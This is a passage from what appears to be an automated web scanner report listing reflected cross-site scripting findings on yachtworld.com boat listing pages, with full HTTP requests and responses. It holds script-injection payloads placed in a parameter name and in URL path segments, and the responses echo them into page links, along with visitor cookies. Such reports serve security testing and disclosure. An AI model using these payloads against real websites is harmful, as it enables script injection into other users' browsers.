01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 30112

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2237772&boat_id=2237772&back=/core/boats/2005/Regulator-32-Forward-Seating-2237772/Parkton/MD/United-States92a9e"><script>alert(1)</script>460982dca51&boat_id=2237772">
...[SNIP]...

3.116. http://www.yachtworld.com/boats/2005/Regulator-32-Forward-Seating-2237772/Parkton/MD/United-States [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2005/Regulator-32-Forward-Seating-2237772/Parkton/MD/United-States

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4dcc"><script>alert(1)</script>1025b3b0115 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2005/Regulator-32-Forward-Seating-2237772/Parkton/MD/United-States?b4dcc"><script>alert(1)</script>1025b3b0115=1 HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); savedLabel0=24-32%20ft%2Cregulator%2CUsed%2C2004; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; latestSavedSearches=0_; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; s_pers=%20s_nr%3D1296156034601%7C1298748034601%3B%20s_lv%3D1296156034602%7C1390764034602%3B%20s_lv_s%3DFirst%2520Visit%7C1296157834602%3B; s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dno%2520search%2520phrase%2520entered%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.10.10.1296155952

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:39:54 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Tue, 18 Jan 2011 15:25:50 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 19:39:54 GMT
Set-Cookie: VIEWED_BOATS_STORE=2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 29032

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
<a rel="nofollow" href="/core/listing/photoGallery.jsp?b4dcc"><script>alert(1)</script>1025b3b0115=1&slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2237772&boat_id=2237772&back=/core/boats/2005/Regulator-32-Forward-Seating-2237772/Parkton/MD/United-States&boat_id=2237772">
...[SNIP]...

3.117. http://www.yachtworld.com/boats/2005/Regulator-32-Forward-Seating-2292192/Pt.-Pleasant/NJ/United-States [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2005/Regulator-32-Forward-Seating-2292192/Pt.-Pleasant/NJ/United-States

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2eca"><script>alert(1)</script>5a970a1c18a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2005/Regulator-32-Forward-Seating-2292192/Pt.-Pleasanta2eca"><script>alert(1)</script>5a970a1c18a/NJ/United-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:02:48 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Sun, 05 Dec 2010 20:45:25 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2292192%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B105%2C900%5B%25%5DPt.+Pleasant%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F9%2F2%2F1%2F2292192_1_mini.jpg%3F1291581360000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2292192%2FPt.-Pleasant%2FNJ%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:02:48 GMT
Set-Cookie: VIEWED_BOATS_STORE=2292192%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B105%2C900%5B%25%5DPt.+Pleasant%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F9%2F2%2F1%2F2292192_1_mini.jpg%3F1291581360000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2292192%2FPt.-Pleasant%2FNJ%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
el="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2292192&boat_id=2292192&back=/core/boats/2005/Regulator-32-Forward-Seating-2292192/Pt.-Pleasanta2eca"><script>alert(1)</script>5a970a1c18a/NJ/United-States&boat_id=2292192">
...[SNIP]...

3.118. http://www.yachtworld.com/boats/2005/Regulator-32-Forward-Seating-2292192/Pt.-Pleasant/NJ/United-States [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2005/Regulator-32-Forward-Seating-2292192/Pt.-Pleasant/NJ/United-States

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8505"><script>alert(1)</script>a3117596587 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2005/Regulator-32-Forward-Seating-2292192/Pt.-Pleasant/NJe8505"><script>alert(1)</script>a3117596587/United-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:03:38 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Sun, 05 Dec 2010 20:45:25 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2292192%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B105%2C900%5B%25%5DPt.+Pleasant%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F9%2F2%2F1%2F2292192_1_mini.jpg%3F1291581360000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2292192%2FPt.-Pleasant%2FNJ%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:03:38 GMT
